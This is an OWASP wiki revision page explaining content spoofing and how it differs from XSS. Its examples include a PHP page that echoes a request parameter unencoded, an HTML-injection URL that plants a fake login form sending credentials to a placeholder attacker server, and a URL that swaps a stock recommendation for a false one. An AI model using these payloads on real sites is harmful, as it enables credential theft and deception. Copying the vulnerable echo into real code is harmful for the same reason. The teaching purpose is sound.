Difference between revisions of "Content Spoofing"

From OWASP
Jump to: navigation, search
(Created page with "{{Template:Attack}} Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' ==Description== Content spoofing, also referred to as ''content inj...")
 
(Text Injection)
 
(3 intermediate revisions by 2 users not shown)
Line 13: Line 13:
  
 
== Content Spoofing vs. Cross-site Scripting<br> ==
 
== Content Spoofing vs. Cross-site Scripting<br> ==
Content spoofing is an attack that is closely related to [[Cross-site Scripting (XSS)]]. The difference is not in the vulnerability, but in the type of attack that leverages the vulnerability. While XSS uses script HTML tags to run JavaScript, content spoofing uses other techniques to modify the page for malicious reasons.
+
Content spoofing is an attack that is closely related to [[Cross-site Scripting (XSS)]]. While XSS uses [https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet <script> and other techniques] to run JavaScript, content spoofing uses other techniques to modify the page for malicious reasons.
  
 +
Even if XSS mitigation techniques are used within the web application, such as proper output encoding, the application can still be vulnerable to text based content spoofing attacks.
  
 
==Risk Factors==
 
==Risk Factors==
Line 26: Line 27:
 
===Hypertext Markup Language (HTML) Injection===
 
===Hypertext Markup Language (HTML) Injection===
  
A possible attack scenario is demonstrated below:
+
A possible attack scenario is demonstrated below. For this scenario, lets assumes no output encoding is being implemented:
  
 
# Attacker discovers injection vulnerability and decides to spoof a login form
 
# Attacker discovers injection vulnerability and decides to spoof a login form
Line 66: Line 67:
  
  
===Text Spoofing===
+
===Text Injection===
  
Another example of a content spoofing attack would be to present false information to a user via text manipulation. An attack scenario is demonstrated below:
+
Another example of a content spoofing attack would be to present false information to a user via text manipulation. An attack scenario is demonstrated below. For this scenario, lets assume proper output encoding HAS been implemented and XSS is not possible:
  
 
#An attacker identifies a web application that gives recommendations to its users on whether they should buy or sell a particular stock
 
#An attacker identifies a web application that gives recommendations to its users on whether they should buy or sell a particular stock
#The attacker identifies a parameter vulnerable to text manipulation
+
#The attacker identifies a vulnerable parameter
#The attacker crafts a malicious link by slightly modifying a valid page
+
#The attacker crafts a malicious link by slightly modifying a valid request
#The link containing the misinformation is sent to a user
+
#The link containing the modified request is sent to a user and they clicks the link
#The user clicks the link and the request is sent to the server
+
 
#A valid webpage is created using the attackers malicious recommendation and the user believes the recommendation was from the stock website
 
#A valid webpage is created using the attackers malicious recommendation and the user believes the recommendation was from the stock website
  
Line 80: Line 80:
 
'''Valid Page'''
 
'''Valid Page'''
 
<pre>
 
<pre>
http://vulnerablesite/suggestions.php?stockid=123&stockrecommendation=We+Reccomend+You+Buy+Now
+
http://vulnerablesite/suggestions.php?stockid=123&stockrecommendation=We+Recommend+You+Buy+Now
 
</pre>
 
</pre>
  
 
'''Modified Page'''
 
'''Modified Page'''
 
<pre>
 
<pre>
http://vulnerablesite/suggestions.php?stockid=123&stockrecommendation=We+Really+Reccomend+You+Sell+This+Stock+Now
+
http://vulnerablesite/suggestions.php?stockid=123&stockrecommendation=We+Really+Recommend+You+Sell+This+Stock+Now
 
</pre>
 
</pre>
 
 
  
 
==Related [[Threat Agents]]==
 
==Related [[Threat Agents]]==

Latest revision as of 14:07, 2 May 2013

This is an Attack. To view all attacks, please see the Attack Category page.


Last revision (mm/dd/yy): 05/2/2013


Description

Content spoofing, also referred to as content injection or virtual defacement, is an attack targeting a user made possible by an injection vulnerability in a web application. When an application does not properly handle user supplied data, an attacker can supply content to a web application, typically via a parameter value, that is reflected back to the user. This presents the user with a modified page under the context of the trusted domain.

This attack is typically used as, or in conjunction with, social engineering because the attack is exploiting a code-based vulnerability and a user's trust.


Content Spoofing vs. Cross-site Scripting

Content spoofing is an attack that is closely related to Cross-site Scripting (XSS). While XSS uses <script> and other techniques to run JavaScript, content spoofing uses other techniques to modify the page for malicious reasons.

Even if XSS mitigation techniques are used within the web application, such as proper output encoding, the application can still be vulnerable to text based content spoofing attacks.

Risk Factors

TBD


Examples

Hypertext Markup Language (HTML) Injection

A possible attack scenario is demonstrated below. For this scenario, lets assumes no output encoding is being implemented:

  1. Attacker discovers injection vulnerability and decides to spoof a login form
  2. Attacker crafts malicious link, including his injected HTML content, and sends it to a user via email
  3. The user visits the page due to the page being located within a trusted domain
  4. The attacker's injected HTML is rendered and presented to the user asking for a username and password
  5. The user enters a username and password, which are both sent to the attackers server


A simple PHP page containing an injection vulnerability via the name parameter:
<?php
    $name = $_REQUEST ['name'];
?>
<html>
	<h1>Welcome to the Internet!</h1>
	<br>
	<body>
            Hello, <?php echo $name; ?>!
	    <p>We are so glad you are here!</p>
	</body>
</html>

The page functionality can be tested by making the following GET request to the page:

http://127.0.0.1/vulnerable.php?name=test

By requesting the link below, the page renders the injected HTML, presents a login form, and comments out the rest of the page after the injection point. Once a user enters their username and password, the values are sent to a page named login.php on the attacker's server via POST.

http://127.0.0.1/vulnerable.php?name=<h3>Please Enter Your Username and Password to Proceed:</h3><form method="POST" 
action="http://attackerserver/login.php">Username: <input type="text" name="username" /><br />Password: <input type="password" 
name="password" /><br /><input type="submit" value="Login" /></form><!--


Text Injection

Another example of a content spoofing attack would be to present false information to a user via text manipulation. An attack scenario is demonstrated below. For this scenario, lets assume proper output encoding HAS been implemented and XSS is not possible:

  1. An attacker identifies a web application that gives recommendations to its users on whether they should buy or sell a particular stock
  2. The attacker identifies a vulnerable parameter
  3. The attacker crafts a malicious link by slightly modifying a valid request
  4. The link containing the modified request is sent to a user and they clicks the link
  5. A valid webpage is created using the attackers malicious recommendation and the user believes the recommendation was from the stock website


Valid Page

http://vulnerablesite/suggestions.php?stockid=123&stockrecommendation=We+Recommend+You+Buy+Now

Modified Page

http://vulnerablesite/suggestions.php?stockid=123&stockrecommendation=We+Really+Recommend+You+Sell+This+Stock+Now

Related Threat Agents


Related Attacks


Related Vulnerabilities


Related Controls


References